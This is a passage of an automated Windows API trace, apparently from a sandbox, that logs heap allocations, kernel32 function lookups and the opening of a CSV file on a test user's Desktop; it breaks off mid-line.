[0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0031.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0031.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0031.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.987] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.989] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8899a0 [0031.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8899a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0031.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.990] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0031.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899a0 [0031.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8899a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0031.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.990] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0031.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0031.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0031.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0031.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv", cchWideChar=56, lpMultiByteStr=0x7c2080, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv", lpUsedDefaultChar=0x0) returned 56 [0031.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.991] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wpwh2letaqsal.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=56, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0031.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=56, lpWideCharStr=0x7db378, cchWideChar=56 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv") returned 56 [0031.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0031.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0031.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0031.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.993] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.993] HeapFree (in: hHeap=0x770000, 